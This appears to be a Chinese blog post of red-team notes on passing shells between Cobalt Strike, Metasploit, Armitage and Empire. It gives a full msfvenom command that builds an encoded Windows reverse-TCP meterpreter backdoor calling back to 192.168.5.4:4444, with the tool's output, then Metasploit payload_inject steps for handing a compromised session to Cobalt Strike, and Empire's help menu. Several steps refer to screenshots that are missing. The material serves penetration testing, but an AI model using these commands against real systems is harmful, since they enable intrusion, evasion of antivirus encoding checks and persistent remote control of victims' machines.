zoukankan      html  css  js  c++  java
  • cobalt strike笔记-CS与MSF,Armitage,Empire互转shell

     

    0x01 Metasploit派生shell给Cobaltstrike

    生成木马:

    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.5.4 LPORT=4444 -f exe > test.exe
    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    Found 1 compatible encoders
    Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
    x86/shikata_ga_nai succeeded with size 368 (iteration=0)
    x86/shikata_ga_nai succeeded with size 395 (iteration=1)
    x86/shikata_ga_nai succeeded with size 422 (iteration=2)
    x86/shikata_ga_nai succeeded with size 449 (iteration=3)
    x86/shikata_ga_nai succeeded with size 476 (iteration=4)
    x86/shikata_ga_nai chosen with final size 476
    Payload size: 476 bytes
    Final size of exe file: 73802 bytes

    msf派生给cs:

    msf exploit(handler) >  use exploit/windows/local/payload_inject
    msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
    msf exploit(payload_inject) > set DisablePayloadHandler true
    msf exploit(payload_inject) > set LHOST 192.168.5.4
    msf exploit(payload_inject) > set LPORT 4444
    msf exploit(payload_inject) > set SESSION 1
    msf exploit(payload_inject) > exploit

    然后在cobaltstrike中创建一个windows/foreign/reverse_tcp Listener
    ,并根据metasploit监听配置cobaltstrike的listener

    cs派生给msf:

     

     

    msf中开启相应的监听:

     
    ps:
    默认情况下,payload_inject执行之后会在本地产生一个新的handler,
    由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置
    set DisablePayloadHandler true

    如果出现错误,PID does not actually exist,可以设置一下注入进程的pid。set pid 进程号

    0x02-Cobaltstrike与Armitage互转shell

    首先在armitage中配置一个handler

    payload要与cobaltstrike的foreign监听器选择相同协议

    Armitage派生shell给cobaltstrike

    选择armitage中的会话,右键,Access-->Pss Session

    0x03-Cobaltstrike与Empire会话互转

    (Empire) > help
    
    Commands
    ========
    agents            Jump to the Agents menu.
    creds             Add/display credentials to/from the database.
    exit              Exit Empire
    help              Displays the help menu.
    list              Lists active agents or listeners.
    listeners         Interact with active listeners.
    reload            Reload one (or all) Empire modules.
    reset             Reset a global option (e.g. IP whitelists).
    searchmodule      Search Empire module names/descriptions.
    set               Set a global option (e.g. IP whitelists).
    show              Show a global option (e.g. IP whitelists).
    usemodule         Use an Empire module.
    usestager         Use an Empire stager.

     

    cobaltstrike添加foreign监听器,协议为http

     

    empire收到会话

  • 相关阅读:
    JMETER-02-常用方法-全局变量,逻辑控制器,随机控制器,吞吐量控制器,加断言,事物控制器 ,循环控制器,仅一次控制器,foreach控制器
    接口自动化01接口基础-之接口的调用之postman和jmeter
    接口自动化01接口基础
    php中的9大缓存技术总结
    tp5自动生成目录
    PHP 服务器变量 $_SERVER
    从正则表达式的iUs说说模式修正符
    简单介绍下MYSQL的索引类型
    mysql几种存储引擎介绍
    PHP中return 和 exit 、break和contiue 区别与用法
  • 原文地址:https://www.cnblogs.com/-qing-/p/11519782.html
Copyright © 2011-2022 走看看